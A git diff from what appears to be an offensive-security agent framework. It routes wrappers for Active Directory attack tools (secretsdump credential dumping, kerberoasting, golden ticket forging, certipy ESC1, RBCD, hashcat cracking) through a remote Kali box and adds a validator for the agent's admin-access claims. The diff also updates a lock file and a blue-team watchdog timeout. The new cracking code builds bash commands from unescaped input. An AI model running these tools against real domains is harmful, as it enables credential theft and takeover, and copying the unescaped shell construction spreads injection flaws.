""" import logging -import os -import subprocess -import tempfile import time from datetime import datetime, timezone from typing import Any @@ -24,10 +23,25 @@ TimelineEvent, User, ) +from ares.core.remote import run_remote logger = logging.getLogger(__name__) +def _run_tool(cmd: list[str], timeout_seconds: int = 300) -> tuple[str, str, int]: + """Execute a command on the remote Kali attack box. + + Args: + cmd: Command as list of arguments + timeout_seconds: Maximum execution time + + Returns: + Tuple of (stdout, stderr, return_code) + """ + result = run_remote(cmd, timeout_seconds=timeout_seconds) + return result.stdout, result.stderr, result.return_code + + class NetworkEnumerationTools(Toolset): """Tools for network scanning and enumeration.""" @@ -58,15 +72,15 @@ def nmap_scan(self, target: str) -> str: >>> result = nmap_scan("192.168.1.2") >>> result = nmap_scan("192.168.1.2 192.168.1.3 192.168.1.4") """ - cmd = ["nmap", "-T4", "-sS", "-sV", "--open"] + target.split(" ") + cmd = ["nmap", "-T4", "-sV", "--open"] + target.split(" ") try: logger.info(f"[*] Scanning targets: {target}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=300) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=300) - if result.returncode != 0: - logger.error(f"[!] Nmap scan failed: {result.stderr}") - return result.stderr + if returncode != 0: + logger.error(f"[!] 
Nmap scan failed: {stderr}") + return stderr or f"Nmap scan failed with code {returncode}" logger.info(f"[*] Nmap scan completed for target {target}") @@ -75,11 +89,8 @@ def nmap_scan(self, target: str) -> str: for ip in target.split(): self.state.queried_hosts.add(ip) - return result.stdout + return stdout - except subprocess.TimeoutExpired: - logger.error("Nmap scan timed out after 5 minutes") - return "Nmap scan timed out after 5 minutes" except Exception as e: logger.error(f"Scan failed: {e!s}") return f"Scan failed: {e!s}" @@ -118,15 +129,13 @@ def enumerate_users(self, target: str, username: str, password: str, domain: str cmd.append("--users") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) logger.info( f"[*] User enumeration completed for {target} (user:{username}, domain:{domain})" ) - return result.stdout + return stdout or stderr - except subprocess.TimeoutExpired: - return f"User enumeration timed out for {target}" except Exception as e: logger.error(f"User enumeration failed: {e}") return f"User enumeration failed for {target}: {e}" @@ -165,13 +174,11 @@ def enumerate_shares( cmd.append("--shares") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) logger.info(f"[*] Share enumeration completed for {target}") - return result.stdout + return stdout or stderr - except subprocess.TimeoutExpired: - return f"Share enumeration timed out for {target}" except Exception as e: logger.error(f"Share enumeration failed: {e}") return f"Share enumeration failed for {target}: {e}" @@ -221,7 +228,7 @@ def secretsdump( >>> secretsdump("192.168.1.100", "Administrator", hash="aad3b4...", domain="DOMAIN") >>> secretsdump("domain.local", "Administrator", no_pass=True) # golden ticket """ - cmd = ["/usr/bin/impacket-secretsdump"] + cmd = ["impacket-secretsdump"] if password and 
domain: target_string = f"{domain}/{username}:{password}@{target}" @@ -241,27 +248,18 @@ def secretsdump( cmd.append(target_string) + # For golden ticket auth, set KRB5CCNAME in the command + if no_pass: + cmd = ["env", "KRB5CCNAME=Administrator.ccache"] + cmd + try: logger.info(f"[*] Running secretsdump on {target} with {username}") - env = os.environ.copy() if no_pass else None - if no_pass and env is not None: - env["KRB5CCNAME"] = "Administrator.ccache" - - result = subprocess.run( - cmd, - check=False, - capture_output=True, - text=True, - timeout=timeout_minutes * 60, - env=env, - ) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=timeout_minutes * 60) logger.info(f"[*] Secretsdump completed for {target}") - return result.stdout + return stdout or stderr or f"Secretsdump returned code {returncode}" - except subprocess.TimeoutExpired: - return "[!] Secretsdump timed out" except Exception as e: return f"[!] Secretsdump error: {e}" @@ -293,7 +291,7 @@ def kerberoast( >>> kerberoast("example.local", "user", "pass", "192.168.1.100") """ cmd = [ - "/usr/bin/impacket-GetUserSPNs", + "impacket-GetUserSPNs", f"{domain}/{username}:{password}", "-dc-ip", dc_ip, @@ -302,11 +300,9 @@ def kerberoast( try: logger.info(f"[*] Kerberoasting {domain} using {username}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) - return result.stdout + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60) + return stdout or stderr - except subprocess.TimeoutExpired: - return "Error: Kerberoasting timed out" except Exception as e: return f"Kerberoasting failed: {e!s}" @@ -338,7 +334,7 @@ def asrep_roast( >>> asrep_roast("example.local", "user", "pass", "192.168.1.100") """ cmd = [ - "/usr/bin/impacket-GetNPUsers", + "impacket-GetNPUsers", f"{domain}/{username}:{password}", "-dc-ip", dc_ip, @@ -347,11 +343,9 @@ def asrep_roast( try: logger.info(f"[*] AS-REP roasting {domain} using {username}") - result = subprocess.run(cmd, check=False, 
capture_output=True, text=True, timeout=60) - return result.stdout + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60) + return stdout or stderr - except subprocess.TimeoutExpired: - return "Error: AS-REP roasting timed out" except Exception as e: return f"AS-REP roasting failed: {e!s}" @@ -397,19 +391,15 @@ def domain_admin_checker( cmd.extend(["-x", "whoami"]) - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) - output = "" - if result.stdout: - output += result.stdout - if result.stderr: - output += "\n" + result.stderr if output else result.stderr + output = stdout + if stderr: + output += "\n" + stderr if output else stderr logger.info(f"[*] Domain admin check completed for {targets}") return output - except subprocess.TimeoutExpired: - return f"Domain admin checker timed out for {targets}" except Exception as e: logger.error(f"Domain admin checker failed: {e}") return f"Domain admin checker failed: {e}" @@ -458,57 +448,30 @@ def crack_with_hashcat( """ output = "[*] Starting hashcat...\n" - try: - with tempfile.NamedTemporaryFile(mode="w", suffix=".hash", delete=False) as hash_file: - hash_file.write(hash_value) - hash_file_path = hash_file.name - - try: - cmd = [ - "hashcat", - "-m", - str(hashcat_mode), - "-a", - "0", - hash_file_path, - wordlist_path, - "--runtime", - str(max_time_minutes * 60), - "--force", - ] - - _result = subprocess.run( - cmd, - check=False, - capture_output=True, - text=True, - timeout=(max_time_minutes * 60) + 30, - ) - - show_cmd = ["hashcat", "-m", str(hashcat_mode), hash_file_path, "--show"] - - show_result = subprocess.run( - show_cmd, - check=False, - capture_output=True, - text=True, - timeout=30, - ) + # Create hash file remotely and run hashcat + hash_file_path = f"/tmp/hash_{time.time()}.hash" # noqa: S108 # nosec B108 - if show_result.stdout.strip(): - output += "\n✓ CRACKED PASSWORDS:\n" + show_result.stdout - 
logger.info("[+] Hashcat successfully cracked hash") - else: - output += "\n✗ No passwords cracked" + try: + # Write hash to remote file and run hashcat + cmd = f""" +echo '{hash_value}' > {hash_file_path} +hashcat -m {hashcat_mode} -a 0 {hash_file_path} {wordlist_path} --runtime {max_time_minutes * 60} --force 2>&1 || true +hashcat -m {hashcat_mode} {hash_file_path} --show 2>&1 +rm -f {hash_file_path} +""" + stdout, stderr, _ = _run_tool( + ["bash", "-c", cmd], + timeout_seconds=(max_time_minutes * 60) + 60, + ) - return output + if stdout and ":" in stdout: + output += "\n✓ CRACKED PASSWORDS:\n" + stdout + logger.info("[+] Hashcat successfully cracked hash") + else: + output += "\n✗ No passwords cracked\n" + (stdout or stderr) - finally: - if os.path.exists(hash_file_path): - os.unlink(hash_file_path) + return output - except subprocess.TimeoutExpired: - return output + "\nError: Hashcat timed out" except Exception as e: return output + f"\nError: {e!s}" @@ -546,65 +509,30 @@ def crack_with_john( """ output = "[*] Starting John the Ripper...\n" - try: - with tempfile.NamedTemporaryFile(mode="w", suffix=".hash", delete=False) as hash_file: - hash_file.write(hash_value) - hash_file_path = hash_file.name - - try: - session_name = f"john_session_{int(time.time())}" - cmd = [ - "john", - "--wordlist=" + wordlist_path, - "--format=" + hash_format, - hash_file_path, - "--session=" + session_name, - ] - - subprocess.run( - cmd, - check=False, - capture_output=True, - text=True, - timeout=(max_time_minutes * 60) + 30, - ) + hash_file_path = f"/tmp/john_hash_{time.time()}.hash" # noqa: S108 # nosec B108 + session_name = f"john_session_{int(time.time())}" - show_cmd = ["john", "--show", "--format=" + hash_format, hash_file_path] - - show_result = subprocess.run( - show_cmd, - check=False, - capture_output=True, - text=True, - timeout=30, - ) - - if show_result.stdout.strip(): - output += "\n✓ CRACKED PASSWORDS:\n" + show_result.stdout - logger.info("[+] John successfully 
cracked hash") - else: - output += "\n✗ No passwords cracked" + try: + # Write hash to remote file and run john + cmd = f""" +echo '{hash_value}' > {hash_file_path} +john --wordlist={wordlist_path} --format={hash_format} {hash_file_path} --session={session_name} 2>&1 || true +john --show --format={hash_format} {hash_file_path} 2>&1 +rm -f {hash_file_path} {session_name}.pot {session_name}.rec {session_name}.log +""" + stdout, stderr, _ = _run_tool( + ["bash", "-c", cmd], + timeout_seconds=(max_time_minutes * 60) + 60, + ) - return output + if stdout and ":" in stdout: + output += "\n✓ CRACKED PASSWORDS:\n" + stdout + logger.info("[+] John successfully cracked hash") + else: + output += "\n✗ No passwords cracked\n" + (stdout or stderr) - finally: - if os.path.exists(hash_file_path): - os.unlink(hash_file_path) + return output - session_files = [ - f"{session_name}.pot", - f"{session_name}.rec", - f"{session_name}.log", - ] - for session_file in session_files: - if os.path.exists(session_file): - try: - os.unlink(session_file) - except Exception: - pass - - except subprocess.TimeoutExpired: - return output + "\nError: John the Ripper timed out" except Exception as e: return output + f"\nError: {e!s}" @@ -658,17 +586,14 @@ def enumerate_share_files( ] logger.info(f"[*] Enumerating files in {share_path}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=120) - if result.returncode != 0: - logger.error(f"[!] Failed to list files: {result.stderr}") - return f"Failed to list files: {result.stderr}" + if returncode != 0: + logger.error(f"[!] Failed to list files: {stderr}") + return f"Failed to list files: {stderr}" - return result.stdout + return stdout - except subprocess.TimeoutExpired: - logger.error(f"[!] File enumeration timed out for {share_path}") - return "File enumeration timed out" except Exception as e: logger.error(f"[!] 
Error during enumeration: {e!s}") return f"Error during enumeration: {e!s}" @@ -719,13 +644,13 @@ def download_file_content( ] logger.info(f"[*] Downloading {file_path} from {share_path}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) + stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=60) - if result.returncode != 0: - logger.error(f"[!] Failed to download file: {result.stderr}") - return f"Failed to download file: {result.stderr}" + if returncode != 0: + logger.error(f"[!] Failed to download file: {stderr}") + return f"Failed to download file: {stderr}" - content = result.stdout + content = stdout logger.info(f"[+] Downloaded {len(content)} bytes from {file_path}") # Log that share was accessed @@ -734,9 +659,6 @@ def download_file_content( return content - except subprocess.TimeoutExpired: - logger.error(f"[!] File download timed out for {file_path}") - return "File download timed out" except Exception as e: logger.error(f"[!] Error downloading file: {e!s}") return f"Error downloading file: {e!s}" @@ -787,11 +709,9 @@ def get_sid( logger.info(f"[*] Getting SID for {domain} using {username}") try: - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) logger.info(f"[*] SID lookup completed for {domain}") - return result.stdout - except subprocess.TimeoutExpired: - return "Error: SID lookup timed out" + return stdout or stderr except Exception as e: return f"Error: {e!s}" @@ -847,7 +767,7 @@ def generate_golden_ticket( try: logger.info("[*] Generating golden ticket for Administrator") logger.info(f"[*] Domain: {domain}, SID: {domain_sid}, Extra SID: {extra_sid}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) if self.state: self.state.has_golden_ticket = True @@ -862,9 +782,7 @@ def generate_golden_ticket( ) 
self.state.timeline.append(event) - return result.stdout - except subprocess.TimeoutExpired: - return "Error: Golden ticket generation timed out" + return stdout or stderr except Exception as e: return f"Error: {e!s}" @@ -925,13 +843,11 @@ def run_bloodhound( try: logger.info(f"[*] Running BloodHound collection for {domain}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=600) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=600) logger.info("[+] BloodHound collection completed") - return result.stdout + "\n" + result.stderr + return stdout + "\n" + (stderr or "") - except subprocess.TimeoutExpired: - return "BloodHound collection timed out after 10 minutes" except Exception as e: logger.error(f"BloodHound failed: {e}") return f"BloodHound failed: {e}" @@ -993,15 +909,13 @@ def certipy_find( try: logger.info(f"[*] Enumerating ADCS for {domain}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=300) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=300) - if "ESC" in result.stdout: + if "ESC" in stdout: logger.warning("[!] VULNERABLE CERTIFICATE TEMPLATES FOUND!") - return result.stdout + "\n" + result.stderr + return stdout + "\n" + (stderr or "") - except subprocess.TimeoutExpired: - return "Certipy enumeration timed out" except Exception as e: return f"Certipy enumeration failed: {e}" @@ -1058,15 +972,13 @@ def certipy_req_esc1( try: logger.info(f"[*] Requesting certificate for {target_upn} via ESC1") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) - if "saved" in result.stdout.lower(): + if "saved" in stdout.lower(): logger.info("[+] Certificate obtained! 
Use certipy_auth next.") - return result.stdout + "\n" + result.stderr + return stdout + "\n" + (stderr or "") - except subprocess.TimeoutExpired: - return "Certificate request timed out" except Exception as e: return f"Certificate request failed: {e}" @@ -1092,15 +1004,13 @@ def certipy_auth(self, pfx_path: str, dc_ip: str) -> str: try: logger.info("[*] Authenticating with certificate") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60) - if "hash" in result.stdout.lower(): + if "hash" in stdout.lower(): logger.info("[+] NTLM hash obtained! Run domain_admin_checker.") - return result.stdout + "\n" + result.stderr + return stdout + "\n" + (stderr or "") - except subprocess.TimeoutExpired: - return "Certificate authentication timed out" except Exception as e: return f"Certificate authentication failed: {e}" @@ -1151,10 +1061,8 @@ def find_delegation( try: logger.info(f"[*] Searching for delegation in {domain}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) - return result.stdout - except subprocess.TimeoutExpired: - return "Delegation search timed out" + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) + return stdout or stderr except Exception as e: return f"Delegation search failed: {e}" @@ -1200,11 +1108,9 @@ def add_computer( try: logger.info(f"[*] Adding computer account {computer_name}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60) logger.info(f"[+] Computer account {computer_name}$ created") - return result.stdout - except subprocess.TimeoutExpired: - return "Computer account creation timed out" + return stdout or stderr except Exception as e: return f"Computer account creation failed: {e}" @@ -1252,11 +1158,9 @@ def rbcd_write( try: logger.info(f"[*] Configuring RBCD: {delegate_from} -> {delegate_to}") - result = 
subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) logger.info("[+] RBCD configured - use get_st next") - return result.stdout - except subprocess.TimeoutExpired: - return "RBCD configuration timed out" + return stdout or stderr except Exception as e: return f"RBCD configuration failed: {e}" @@ -1302,14 +1206,12 @@ def get_st( try: logger.info(f"[*] Requesting ST for {target_spn} as {impersonate_user}") - result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120) + stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120) - if ".ccache" in result.stdout: + if ".ccache" in stdout: logger.info("[+] Ticket obtained! Export KRB5CCNAME and use secretsdump -k") - return result.stdout - except subprocess.TimeoutExpired: - return "Service ticket request timed out" + return stdout or stderr except Exception as e: return f"Service ticket request failed: {e}" @@ -1449,11 +1351,67 @@ def record_finding( return f"✓ Recorded share: {share.name} on {share.host}" if finding_type == "admin_access": + details = data.get("details", "") + + # Validate that this is actually a success, not an error being misreported + error_indicators = [ + "not found", + "not available", + "not installed", + "not in path", + "missing", + "failed", + "error", + "cannot", + "unable", + "timed out", + "timeout", + "not properly configured", + "command not found", + "no such file", + "permission denied", + ] + details_lower = details.lower() + + for indicator in error_indicators: + if indicator in details_lower: + logger.warning( + f"[!] Rejecting admin_access finding - details contain error indicator '{indicator}': {details[:200]}" + ) + return ( + f"[!] REJECTED: Cannot record admin_access with error details. " + f"The details contain '{indicator}' which indicates a failure, not success. " + f"Only call record_finding('admin_access') when you have CONFIRMED admin access " + f"(e.g., 'Pwn3d!' 
in netexec output, successful secretsdump, etc.). " + f"If tools are missing or not working, troubleshoot the environment first." + ) + + # Require some positive indicator of success + success_indicators = [ + "pwn3d", + "admin", + "success", + "authenticated", + "dumped", + "obtained", + ] + has_success_indicator = any(ind in details_lower for ind in success_indicators) + + if not has_success_indicator and len(details) > 0: + logger.warning( + f"[!] Admin access claim lacks success indicators: {details[:200]}" + ) + return ( + "[!] REJECTED: admin_access finding should include evidence of success " + "(e.g., 'Pwn3d!' output, successful authentication, dumped credentials). " + "Provide specific details showing HOW admin access was confirmed." + ) + self.state.has_domain_admin = True event = TimelineEvent( id=f"evt-{len(self.state.timeline):04d}", timestamp=datetime.now(timezone.utc), - description=f"Domain admin access achieved: {data.get('details', '')}", + description=f"Domain admin access achieved: {details}", mitre_techniques=["T1078.002"], # Domain Accounts confidence=1.0, source="domain_admin_checker", diff --git a/uv.lock b/uv.lock index 82f787e0..92e371b4 100644 --- a/uv.lock +++ b/uv.lock @@ -7,24 +7,6 @@ resolution-markers = [ "python_full_version < '3.11'", ] -[[package]] -name = "aiobotocore" -version = "2.26.0" -source = { registry = "https://pypi.org/simple" } -dependencies = [ - { name = "aiohttp" }, - { name = "aioitertools" }, - { name = "botocore" }, - { name = "jmespath" }, - { name = "multidict" }, - { name = "python-dateutil" }, - { name = "wrapt" }, -] -sdist = { url = "https://files.pythonhosted.org/packages/4d/f8/99fa90d9c25b78292899fd4946fce97b6353838b5ecc139ad8ba1436e70c/aiobotocore-2.26.0.tar.gz", hash = "sha256:50567feaf8dfe2b653570b4491f5bc8c6e7fb9622479d66442462c021db4fadc", size = 122026, upload-time = "2025-11-28T07:54:59.956Z" } -wheels = [ - { url = 
"https://files.pythonhosted.org/packages/b7/58/3bf0b7d474607dc7fd67dd1365c4e0f392c8177eaf4054e5ddee3ebd53b5/aiobotocore-2.26.0-py3-none-any.whl", hash = "sha256:a793db51c07930513b74ea7a95bd79aaa42f545bdb0f011779646eafa216abec", size = 87333, upload-time = "2025-11-28T07:54:58.457Z" }, -] - [[package]] name = "aiofiles" version = "24.1.0" @@ -129,15 +111,6 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/5d/28/a8a9fc6957b2cee8902414e41816b5ab5536ecf43c3b1843c10e82c559b2/aiohttp-3.13.2-cp313-cp313-win_amd64.whl", hash = "sha256:a88d13e7ca367394908f8a276b89d04a3652044612b9a408a0bb22a5ed976a1a", size = 452192, upload-time = "2025-10-28T20:57:34.166Z" }, ] -[[package]] -name = "aioitertools" -version = "0.13.0" -source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/fd/3c/53c4a17a05fb9ea2313ee1777ff53f5e001aefd5cc85aa2f4c2d982e1e38/aioitertools-0.13.0.tar.gz", hash = "sha256:620bd241acc0bbb9ec819f1ab215866871b4bbd1f73836a55f799200ee86950c", size = 19322, upload-time = "2025-11-06T22:17:07.609Z" } -wheels = [ - { url = "https://files.pythonhosted.org/packages/10/a1/510b0a7fadc6f43a6ce50152e69dbd86415240835868bb0bd9b5b88b1e06/aioitertools-0.13.0-py3-none-any.whl", hash = "sha256:0be0292b856f08dfac90e31f4739432f4cb6d7520ab9eb73e143f4f2fa5259be", size = 24182, upload-time = "2025-11-06T22:17:06.502Z" }, -] - [[package]] name = "aiosignal" version = "1.4.0" @@ -194,6 +167,7 @@ name = "ares" version = "0.1.0" source = { editable = "." 
} dependencies = [ + { name = "boto3" }, { name = "cyclopts" }, { name = "dreadnode" }, { name = "httpx" }, @@ -226,6 +200,7 @@ dev = [ [package.metadata] requires-dist = [ + { name = "boto3", specifier = ">=1.42.25" }, { name = "cyclopts", specifier = ">=4.2.0" }, { name = "dreadnode", specifier = ">=1.17.0" }, { name = "httpx", specifier = ">=0.28.0,<1.0.0" }, @@ -302,18 +277,32 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/02/e3/a4fa1946722c4c7b063cc25043a12d9ce9b4323777f89643be74cef2993c/backrefs-6.1-py39-none-any.whl", hash = "sha256:a9e99b8a4867852cad177a6430e31b0f6e495d65f8c6c134b68c14c3c95bf4b0", size = 381058, upload-time = "2025-11-15T14:52:06.698Z" }, ] +[[package]] +name = "boto3" +version = "1.42.25" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "botocore" }, + { name = "jmespath" }, + { name = "s3transfer" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/29/30/755a6c4b27ad4effefa9e407f84c6f0a69f75a21c0090beb25022dfcfd3f/boto3-1.42.25.tar.gz", hash = "sha256:ccb5e757dd62698d25766cc54cf5c47bea43287efa59c93cf1df8c8fbc26eeda", size = 112811, upload-time = "2026-01-09T20:27:44.73Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/14/79/012734f4e510b0a6beec2a3d5f437b3e8ef52174b1d38b1d5fdc542316d7/boto3-1.42.25-py3-none-any.whl", hash = "sha256:8128bde4f9d5ffce129c76d1a2efe220e3af967a2ad30bc305ba088bbc96343d", size = 140575, upload-time = "2026-01-09T20:27:42.788Z" }, +] + [[package]] name = "botocore" -version = "1.41.5" +version = "1.42.25" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "jmespath" }, { name = "python-dateutil" }, { name = "urllib3" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/90/22/7fe08c726a2e3b11a0aef8bf177e83891c9cb2dc1809d35c9ed91a9e60e6/botocore-1.41.5.tar.gz", hash = "sha256:0367622b811597d183bfcaab4a350f0d3ede712031ce792ef183cabdee80d3bf", size = 14668152, upload-time = "2025-11-26T20:27:38.026Z" } +sdist 
= { url = "https://files.pythonhosted.org/packages/2c/b5/8f961c65898deb5417c9e9e908ea6c4d2fe8bb52ff04e552f679c88ed2ce/botocore-1.42.25.tar.gz", hash = "sha256:7ae79d1f77d3771e83e4dd46bce43166a1ba85d58a49cffe4c4a721418616054", size = 14879737, upload-time = "2026-01-09T20:27:34.676Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/4e/4e/21cd0b8f365449f1576f93de1ec8718ed18a7a3bc086dfbdeb79437bba7a/botocore-1.41.5-py3-none-any.whl", hash = "sha256:3fef7fcda30c82c27202d232cfdbd6782cb27f20f8e7e21b20606483e66ee73a", size = 14337008, upload-time = "2025-11-26T20:27:35.208Z" }, + { url = "https://files.pythonhosted.org/packages/1e/b0/61e3e61d437c8c73f0821ce8a8e2594edfc1f423e354c38fa56396a4e4ca/botocore-1.42.25-py3-none-any.whl", hash = "sha256:470261966aab1d09a1cd4ba56810098834443602846559ba9504f6613dfa52dc", size = 14553881, upload-time = "2026-01-09T20:27:30.487Z" }, ] [[package]] @@ -3008,16 +2997,27 @@ wheels = [ [[package]] name = "s3fs" -version = "2025.12.0" +version = "0.4.2" source = { registry = "https://pypi.org/simple" } dependencies = [ - { name = "aiobotocore" }, - { name = "aiohttp" }, + { name = "botocore" }, { name = "fsspec" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/cf/26/fff848df6a76d6fec20208e61548244639c46a741e296244c3404d6e7df0/s3fs-2025.12.0.tar.gz", hash = "sha256:8612885105ce14d609c5b807553f9f9956b45541576a17ff337d9435ed3eb01f", size = 81217, upload-time = "2025-12-03T15:34:04.754Z" } +sdist = { url = "https://files.pythonhosted.org/packages/d9/9a/504cb277632c4d325beabbd03bb43778f0decb9be22d9e0e6c62f44540c7/s3fs-0.4.2.tar.gz", hash = "sha256:2ca5de8dc18ad7ad350c0bd01aef0406aa5d0fff78a561f0f710f9d9858abdd0", size = 57527, upload-time = "2020-03-31T15:24:26.388Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/b8/e4/b8fc59248399d2482b39340ec9be4bb2493846ac23641b43115a7e5cd675/s3fs-0.4.2-py3-none-any.whl", hash = "sha256:91c1dfb45e5217bd441a7a560946fe865ced6225ff7eb0fb459fe6e601a95ed3", size = 
19791, upload-time = "2020-03-31T15:24:24.952Z" }, +] + +[[package]] +name = "s3transfer" +version = "0.16.0" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "botocore" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/05/04/74127fc843314818edfa81b5540e26dd537353b123a4edc563109d8f17dd/s3transfer-0.16.0.tar.gz", hash = "sha256:8e990f13268025792229cd52fa10cb7163744bf56e719e0b9cb925ab79abf920", size = 153827, upload-time = "2025-12-01T02:30:59.114Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/44/8c/04797ebb53748b4d594d4c334b2d9a99f2d2e06e19ad505f1313ca5d56eb/s3fs-2025.12.0-py3-none-any.whl", hash = "sha256:89d51e0744256baad7ae5410304a368ca195affd93a07795bc8ba9c00c9effbb", size = 30726, upload-time = "2025-12-03T15:34:03.576Z" }, + { url = "https://files.pythonhosted.org/packages/fc/51/727abb13f44c1fcf6d145979e1535a35794db0f6e450a0cb46aa24732fe2/s3transfer-0.16.0-py3-none-any.whl", hash = "sha256:18e25d66fed509e3868dc1572b3f427ff947dd2c56f844a5bf09481ad3f3b2fe", size = 86830, upload-time = "2025-12-01T02:30:57.729Z" }, ] [[package]] From 37fc3739f22766598cf6bf2a4c723eadaa7b7698 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 9 Jan 2026 20:06:18 -0700 Subject: [PATCH 2/5] refactor: replace signal-based timeout with watchdog thread in investigation agent **Added:** - Introduced `WatchdogTimer` class for enforcing hard investigation timeout using a background thread, enabling forced exit and partial report generation even if the event loop is blocked **Changed:** - Replaced Unix-only signal-based hard timeout with cross-platform watchdog thread in `InvestigationOrchestrator` - Updated timeout handling logic to use the new watchdog and improved partial report generation upon timeout - Cleaned up code by removing signal handler setup and exception raising for timeout, delegating forced exit to the watchdog - Adjusted logging to reflect new watchdog mechanism and clarify timeout events **Removed:** - 
Removed dependency on `signal` module and associated signal handler logic for timeouts - Eliminated `InvestigationTimeoutError` usage and related exception handling from the orchestration flow - Removed code for restoring old signal handlers and alarm cleanup, as they're no longer needed --- src/ares/agents/blue/soc_investigator.py | 111 +++++++++++++++-------- 1 file changed, 72 insertions(+), 39 deletions(-) diff --git a/src/ares/agents/blue/soc_investigator.py b/src/ares/agents/blue/soc_investigator.py index 9affbea8..e20f5f80 100644 --- a/src/ares/agents/blue/soc_investigator.py +++ b/src/ares/agents/blue/soc_investigator.py @@ -4,7 +4,8 @@ Main agent implementation using Dreadnode Agent SDK. """ -import signal +import os +import threading import uuid from datetime import datetime, timedelta, timezone from pathlib import Path @@ -22,6 +23,62 @@ class InvestigationTimeoutError(Exception): """Raised when investigation exceeds hard timeout.""" +class WatchdogTimer: + """Watchdog that generates report and forcefully exits if timeout is exceeded.""" + + def __init__( + self, + timeout_seconds: int, + investigation_id: str, + state: "InvestigationState", + report_dir: Path, + ): + self.timeout = timeout_seconds + self.investigation_id = investigation_id + self.state = state + self.report_dir = report_dir + self._timer: threading.Timer | None = None + self._cancelled = False + + def _timeout_handler(self) -> None: + if self._cancelled: + return + + logger.critical( + f"WATCHDOG: Investigation {self.investigation_id} exceeded " + f"hard timeout of {self.timeout}s" + ) + logger.warning( + f"Current state: {len(self.state.evidence)} evidence items, " + f"{len(self.state.timeline)} timeline events" + ) + + # Generate partial report before dying + try: + from ares.reports.investigation import MarkdownReportGenerator + + generator = MarkdownReportGenerator(self.report_dir) + report_path = generator.generate(self.state) + logger.warning(f"Partial report saved to: 
{report_path}") + except Exception as e: + logger.error(f"Failed to generate partial report: {e}") + + logger.critical("Forcing exit due to timeout") + os._exit(1) + + def start(self) -> None: + self._timer = threading.Timer(self.timeout, self._timeout_handler) + self._timer.daemon = True + self._timer.start() + logger.info(f"Watchdog started: {self.timeout}s ({self.timeout // 60}m)") + + def cancel(self) -> None: + self._cancelled = True + if self._timer: + self._timer.cancel() + logger.debug("Watchdog cancelled") + + def build_initial_prompt(alert: dict) -> str: """Build the initial prompt with alert context. @@ -187,26 +244,23 @@ async def investigate(self, alert: dict) -> dict: logger.info(f"Starting investigation {investigation_id} for alert: {alert_name}") - # Hard timeout using signal (works even if event loop is blocked) - # 1 minute per step + 2 minutes buffer for setup/teardown - hard_timeout_seconds = (self.max_steps * 60) + 120 - - def _timeout_handler(signum, frame): - raise InvestigationTimeoutError( - f"Investigation {investigation_id} exceeded hard timeout of {hard_timeout_seconds}s" - ) - - # Set up signal-based hard timeout (Unix only) - old_handler = signal.signal(signal.SIGALRM, _timeout_handler) - signal.alarm(hard_timeout_seconds) - logger.info(f"Hard timeout set: {hard_timeout_seconds}s ({hard_timeout_seconds // 60}m)") - # Create investigation state early so we can generate partial reports on timeout state = InvestigationState( investigation_id=investigation_id, alert=alert, ) + # Hard timeout using watchdog thread (works even if event loop is blocked) + # 1 minute per step + 2 minutes buffer for setup/teardown + hard_timeout_seconds = (self.max_steps * 60) + 120 + watchdog = WatchdogTimer( + hard_timeout_seconds, + investigation_id, + state, + self.report_dir, + ) + watchdog.start() + try: # Ensure MCP connection is ready await self._ensure_mcp_connection() @@ -248,7 +302,7 @@ def _timeout_handler(signum, frame): max_steps=self.max_steps, ) 
